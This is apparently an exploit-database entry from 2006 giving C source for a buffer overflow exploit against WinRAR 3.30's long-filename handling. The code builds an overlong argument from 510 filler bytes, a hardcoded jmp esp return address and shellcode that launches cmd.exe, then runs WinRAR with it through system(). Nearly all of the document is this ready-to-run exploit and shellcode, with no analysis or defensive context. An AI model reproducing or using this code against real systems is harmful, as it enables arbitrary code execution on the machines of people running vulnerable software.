WinRAR 3.30 Long Filename Buffer Overflow Exploit

2006-01-04
ID: 25837
Download vulnerable application: None
/* WinRAR Buffer Overflow 3.30 Exploit
*
* Bug founded by: Vredited By Alpha Programmer & Trap-Set U.H Team
* Exploit made by: K4P0
* Contact: [email protected]
*/

#include <stdio.h>
#include <windows.h>

int main(void)
{
   char EvilBuff[1024];

   // Normal cmd.exe shellcode.
   char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
   		      "\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6"
		      "\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
                      "\xF8\x50\xBB\x44\x80\xBF\x77\xFF\xD3";

   char jmpesp_offset[] = "\x0F\x98\xF8\x77";
   char Prog[1024] = "WinRAR ";

   printf("WinRAR Buffer Overflow 3.30 Exploit\n\n");
   printf("Bug discovered by: Vredited By Alpha Programmer & Trap-Set U.H Team\n");
   printf("Exploit made by: K4P0\n");
   memset(EvilBuff, 0x00, 1024);
   memset(EvilBuff, 0x41, 510);
   strncat(EvilBuff, jmpesp_offset, 1024);
   strncat(EvilBuff, shellcode, 1024);
   strncat(Prog, EvilBuff, 1024);
   printf("\nExploiting...\n");
   system(Prog);
   return 0;
}


1-4-2 (www02)